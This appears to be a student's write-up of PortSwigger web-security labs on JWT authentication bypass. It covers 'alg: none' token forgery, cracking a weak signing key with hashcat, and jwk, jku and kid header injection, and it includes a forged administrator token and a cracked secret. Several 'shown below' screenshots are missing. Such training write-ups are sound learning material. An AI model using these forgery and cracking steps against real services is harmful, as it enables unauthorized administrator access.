JWT Attacks

Lab: JWT authentication bypass via unverified signature

We can see that the payload portion consist the username.

So we just need to change to administrator and replace in the browser to see the admin page.

Lab: JWT authentication bypass via flawed signature verification

First, we will get the JWT after logging into the user account.

After that, we will just change the payload and re-encode back to base64

Then, we will remove the signature portion at the end and it should look like this

eyJraWQiOiJjOTViYmI2MC1jZDc4LTQ4Y2UtYjQyMS02MWYzMmE5ZTUyMzQiLCJhbGciOiJub25lIn0.eyJpc3MiOiJwb3J0c3dpZ2dlciIsImV4cCI6MTczOTI0MTgwNywic3ViIjoiYWRtaW5pc3RyYXRvciJ9.

Finally, change the value in the cookie and refresh the web page to get access to the administrator web page.

Lab: JWT authentication bypass via weak signing key

First, we will login to get the JWT Token.

We will then use hashcat to get the secret key

hashcat -a 0 -m 16500 eyJraWQiOiI2ZWRhNmFmMS03ODhmLTQ2OTctOGZhNy0xOTcxYzNjYWQyYmQiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJwb3J0c3dpZ2dlciIsImV4cCI6MTczOTI0NDE1MSwic3ViIjoid2llbmVyIn0.i1EP6k8T7B74ZNm33-UGO5VTBnkKV26cjpneQe_WIVk /usr/share/wordlists/rockyou.txt

After running, we are able to get the secret key used

eyJraWQiOiI2ZWRhNmFmMS03ODhmLTQ2OTctOGZhNy0xOTcxYzNjYWQyYmQiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJwb3J0c3dpZ2dlciIsImV4cCI6MTczOTI0NDE1MSwic3ViIjoid2llbmVyIn0.i1EP6k8T7B74ZNm33-UGO5VTBnkKV26cjpneQe_WIVk:secret1

We will put it in a file to be used to recalculate the signature so that it is valid

Next, we will just modify the JWT Token to be shown after intercepting the request to /my-account below

After sending the request, we can see this.

However, if we try to enter the admin page, it will say we have no administrator rights. It turns out the cookie got reverted to the original version. So we will just need to find the JWT Token that we have modified just now and replace in our browser to access the admin panel

Lab: JWT authentication bypass via jwk header injection

First, generate a new RSA key

Send a request with a JWT Token to the repeater

After which, we will modify the payload as what is shown below

Then we will clock on Attack and Embedded JWK

After which, it will generate the JWT Token as shown below

Lastly, we will just need to change the value in the browser to get into the admin panel.

Lab: JWT authentication bypass via jku header injection

We will use the JWK that we have created from the previous lab.

First, we will click on Copy Public Key as JWK

Next, we will paste into the body of the response inside the exploit server and modify to what is shown below.

{
    "keys": [
                { 
                    "kty": "RSA",
                    "e": "AQAB",
                    "kid": "d45fc7bd-4a71-4b87-a2f3-e9e7d58eb4fa",
                    "n": "oxPGjaeZ5VmzHygqul6-HTjt9GduC5HgeD9iOc4h-hUFPvI4xtBuGPOQpFw8P1bjyKHhfNkYELDM3RhdlMAncGHLWnH4XFPyMVdzXsy5hIcSeluzQ2hyFmxCiCWM3N7Nn353h6w2kXRkSVIKd18dtS7YDTPBljH-bxiQNHEoY7lgbxNBh2VB3EyQlABX6CFbmp15OOQggx4TS_zWMopyFwshBQKSwGUrNcm-FOOgOvndSE3ues68UxuFPAlRruj0WrmUP1rjvwL9Dch18dLOPp4rfKT71rr5a0agY3mY6vjxSoRwlRFin1_pLm_9Duf3IZk5t6u7w5hqGlgVd8IC0w"
                }
    ]
}

Next we will send the payload with a JWT Token to the repeater and modify the payload as shown below. Make sure that the kidmatches what is being uploaded on the exploit server

After which, we will just sign the token and send the request, we should be able to see the admin panel

Finally, we will change the cookie on browser to access the admin panel

Lab: JWT authentication bypass via kid header path traversal

First, we will need to generate a symmetric key using JWT Editor

After generating, we will then copy the kover to the modified JWT Token and with whatever changes that we want to put into the token.

We will then sign the token using the symmetric key that we generated and send the request. We should be able to see the admin panel.

Finally, we can change the cookie value in the browser to access it.